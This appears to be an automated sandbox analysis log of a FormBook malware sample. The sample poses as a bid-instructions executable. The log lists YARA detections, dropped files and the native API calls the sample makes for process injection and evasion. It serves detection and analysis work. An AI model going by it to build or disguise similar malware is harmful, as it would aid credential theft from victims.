      Source: Yara match | File source: 00000003.00000002.365243052.00000000000A0000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      Detected FormBook malware
      Source: C:\Windows\SysWOW64\wlanext.exe | Dropped file: C:\Users\user\AppData\Roaming\730-O-47\730logri.ini
      Source: C:\Windows\SysWOW64\wlanext.exe | Dropped file: C:\Users\user\AppData\Roaming\730-O-47\730logrv.ini
      Malicious sample detected (through community Yara rule)
      Source: 00000010.00000002.513778360.0000000000940000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000002.513778360.0000000000940000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000002.512896317.00000000006D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000002.512896317.00000000006D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000002.514036369.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000002.514036369.0000000000970000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000002.369820978.000000001DFE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.369820978.000000001DFE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000002.520702711.000000000336F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000010.00000002.514310291.00000000009AD000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000003.00000002.365243052.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000002.365243052.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279A20 NtResumeThread,LdrInitializeThunk,3_2_1E279A20
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_1E279A00
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_1E279660
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279A50 NtCreateFile,LdrInitializeThunk,3_2_1E279A50
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2796E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_1E2796E0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279710 NtQueryInformationToken,LdrInitializeThunk,3_2_1E279710
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2797A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_1E2797A0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279780 NtMapViewOfSection,LdrInitializeThunk,3_2_1E279780
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279860 NtQuerySystemInformation,LdrInitializeThunk,3_2_1E279860
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279840 NtDelayExecution,LdrInitializeThunk,3_2_1E279840
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2798F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_1E2798F0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_1E279910
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279540 NtReadFile,LdrInitializeThunk,3_2_1E279540
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2799A0 NtCreateSection,LdrInitializeThunk,3_2_1E2799A0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2795D0 NtClose,LdrInitializeThunk,3_2_1E2795D0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279610 NtEnumerateValueKey,3_2_1E279610
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279A10 NtQuerySection,3_2_1E279A10
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279670 NtQueryInformationProcess,3_2_1E279670
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279650 NtQueryValueKey,3_2_1E279650
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279A80 NtOpenDirectoryObject,3_2_1E279A80
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2796D0 NtCreateKey,3_2_1E2796D0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279730 NtQueryVirtualMemory,3_2_1E279730
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279B00 NtSetValueKey,3_2_1E279B00
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E27A710 NtOpenProcessToken,3_2_1E27A710
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279760 NtOpenProcess,3_2_1E279760
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279770 NtSetInformationFile,3_2_1E279770
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E27A770 NtOpenThread,3_2_1E27A770
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E27A3B0 NtGetContextThread,3_2_1E27A3B0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279FE0 NtCreateMutant,3_2_1E279FE0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279820 NtEnumerateKey,3_2_1E279820
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E27B040 NtSuspendThread,3_2_1E27B040
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2798A0 NtWriteVirtualMemory,3_2_1E2798A0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279520 NtWaitForSingleObject,3_2_1E279520
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E27AD30 NtSetContextThread,3_2_1E27AD30
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279560 NtWriteFile,3_2_1E279560
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E279950 NtQueueApcThread,3_2_1E279950
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2795F0 NtQueryInformationFile,3_2_1E2795F0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2799D0 NtCreateProcessEx,3_2_1E2799D0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00561019 NtProtectVirtualMemory,LoadLibraryA,3_2_00561019
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056814A LoadLibraryA,NtSetInformationThread,3_2_0056814A
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00566519 NtSetInformationThread,3_2_00566519
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00567D0B NtProtectVirtualMemory,3_2_00567D0B
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005606B5 EnumWindows,NtSetInformationThread,3_2_005606B5
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568449 NtSetInformationThread,3_2_00568449
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568876 NtSetInformationThread,3_2_00568876
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056086A NtSetInformationThread,3_2_0056086A
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056083D NtSetInformationThread,3_2_0056083D
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056103D NtProtectVirtualMemory,3_2_0056103D
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005608E4 NtSetInformationThread,3_2_005608E4
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005684E4 NtSetInformationThread,3_2_005684E4
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568499 NtSetInformationThread,3_2_00568499
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00560884 NtSetInformationThread,3_2_00560884
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005680A9 NtProtectVirtualMemory,3_2_005680A9
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568150 NtSetInformationThread,3_2_00568150
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056853A NtSetInformationThread,3_2_0056853A
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005685D3 NtSetInformationThread,3_2_005685D3
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005669C2 NtSetInformationThread,3_2_005669C2
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005681F2 NtSetInformationThread,3_2_005681F2
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568589 NtSetInformationThread,3_2_00568589
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005681A3 NtSetInformationThread,3_2_005681A3
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568627 NtSetInformationThread,3_2_00568627
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005682CE NtSetInformationThread,3_2_005682CE
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056869C NtSetInformationThread,3_2_0056869C
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00560759 NtSetInformationThread,3_2_00560759
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568363 NtSetInformationThread,3_2_00568363
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056831B NtSetInformationThread,3_2_0056831B
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00561F03 NtSetInformationThread,3_2_00561F03
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568732 NtSetInformationThread,3_2_00568732
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005683FE NtSetInformationThread,3_2_005683FE
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005607E5 NtSetInformationThread,3_2_005607E5
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00568786 NtSetInformationThread,3_2_00568786
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005683B0 NtSetInformationThread,3_2_005683B0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00562FA5 NtSetInformationThread,LoadLibraryA,3_2_00562FA5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA96E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_02EA96E0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA96D0 NtCreateKey,LdrInitializeThunk,16_2_02EA96D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9660 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_02EA9660
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9650 NtQueryValueKey,LdrInitializeThunk,16_2_02EA9650
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9A50 NtCreateFile,LdrInitializeThunk,16_2_02EA9A50
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9610 NtEnumerateValueKey,LdrInitializeThunk,16_2_02EA9610
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9FE0 NtCreateMutant,LdrInitializeThunk,16_2_02EA9FE0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9780 NtMapViewOfSection,LdrInitializeThunk,16_2_02EA9780
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9770 NtSetInformationFile,LdrInitializeThunk,16_2_02EA9770
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9B00 NtSetValueKey,LdrInitializeThunk,16_2_02EA9B00
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9710 NtQueryInformationToken,LdrInitializeThunk,16_2_02EA9710
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9860 NtQuerySystemInformation,LdrInitializeThunk,16_2_02EA9860
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9840 NtDelayExecution,LdrInitializeThunk,16_2_02EA9840
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA95D0 NtClose,LdrInitializeThunk,16_2_02EA95D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA99A0 NtCreateSection,LdrInitializeThunk,16_2_02EA99A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9560 NtWriteFile,LdrInitializeThunk,16_2_02EA9560
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9540 NtReadFile,LdrInitializeThunk,16_2_02EA9540
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_02EA9910
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9A80 NtOpenDirectoryObject,16_2_02EA9A80
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9670 NtQueryInformationProcess,16_2_02EA9670
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9A20 NtResumeThread,16_2_02EA9A20
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9A00 NtProtectVirtualMemory,16_2_02EA9A00
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9A10 NtQuerySection,16_2_02EA9A10
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA97A0 NtUnmapViewOfSection,16_2_02EA97A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EAA3B0 NtGetContextThread,16_2_02EAA3B0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9760 NtOpenProcess,16_2_02EA9760
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EAA770 NtOpenThread,16_2_02EAA770
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9730 NtQueryVirtualMemory,16_2_02EA9730
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EAA710 NtOpenProcessToken,16_2_02EAA710
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA98F0 NtReadVirtualMemory,16_2_02EA98F0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA98A0 NtWriteVirtualMemory,16_2_02EA98A0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EAB040 NtSuspendThread,16_2_02EAB040
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9820 NtEnumerateKey,16_2_02EA9820
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA95F0 NtQueryInformationFile,16_2_02EA95F0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA99D0 NtCreateProcessEx,16_2_02EA99D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9950 NtQueueApcThread,16_2_02EA9950
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EA9520 NtWaitForSingleObject,16_2_02EA9520
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_02EAAD30 NtSetContextThread,16_2_02EAAD30
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006E9CA0 NtCreateFile,16_2_006E9CA0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006E9D50 NtReadFile,16_2_006E9D50
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006E9DD0 NtClose,16_2_006E9DD0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 16_2_006E9E80 NtAllocateVirtualMemory,16_2_006E9E80
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E256E303_2_1E256E30
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E26EBB03_2_1E26EBB0
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2F10023_2_1E2F1002
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E24B0903_2_1E24B090
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E230D203_2_1E230D20
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E2541203_2_1E254120
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E23F9003_2_1E23F900
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_1E301D553_2_1E301D55
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00564B903_2_00564B90
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056144E3_2_0056144E
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005640723_2_00564072
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_00566C6D3_2_00566C6D
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056601E3_2_0056601E
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056103D3_2_0056103D
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005638DB3_2_005638DB
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005674A53_2_005674A5
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056415A3_2_0056415A
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_0056410D3_2_0056410D
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005681F23_2_005681F2
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005659F83_2_005659F8
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exeCode function: 3_2_005641B13_2_005641B1
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 3_2_0056424E
      Source: C:\Users\user\Desktop\1-RFQ-IOCL-PP-IN-301 BID INSTRUCTIONSCOMMERCIAL TERMS AND CONDITIONS-2020-10-14..exe  Code function: 3_2_00561E6F
